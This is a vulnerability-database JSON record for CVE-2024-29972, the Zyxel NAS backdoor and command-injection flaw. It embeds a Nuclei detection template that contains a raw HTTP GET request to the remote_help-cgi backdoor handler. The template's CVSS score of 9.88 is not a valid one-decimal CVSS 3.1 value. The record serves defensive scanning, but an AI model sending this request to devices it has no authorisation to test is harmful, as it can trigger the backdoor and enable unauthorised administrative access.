{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-29972/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-29972/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-29972/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-29972/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-29972/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-29972"},"sightings":{"href":"/api/v1/sightings/cve-2024-29972"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.89326,"kev":false,"percentile":0.99779},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-29972.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-29972\n\ninfo:\n  name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account\n  author: gy741\n  severity: critical\n  description: |\n    The command injection vulnerability in the CGI program \"remote_help-cgi\" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.\n  impact: |\n    Attackers can use the backdoor account to gain unauthorized administrative access to the NAS device.\n  remediation: |\n    Update Zyxel NAS326 firmware to a version that removes the backdoor account.\n  reference:\n    - https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-29972\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.88\n    cve-id: CVE-2024-29972\n    cwe-id: CWE-78\n    epss-score: 0.89326\n    epss-percentile: 0.99779\n    cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: zyxel\n    product: nas326_firmware\n    fofa-query: app=\"ZYXEL-NAS326\"\n  tags: cve,cve2024,zyxel,backdoor,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'result=0')\"\n        condition: and\n# digest: 490a0046304402200b17d0f26502429dbd7894ffbfe06a0a4f4c20af548affd41bafdd99e38762fc02201ac1d5e7ff9562ce6e2a8ebd8219b42a2cdf0b19adcff1766960a65b6d190f0a:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-29972"}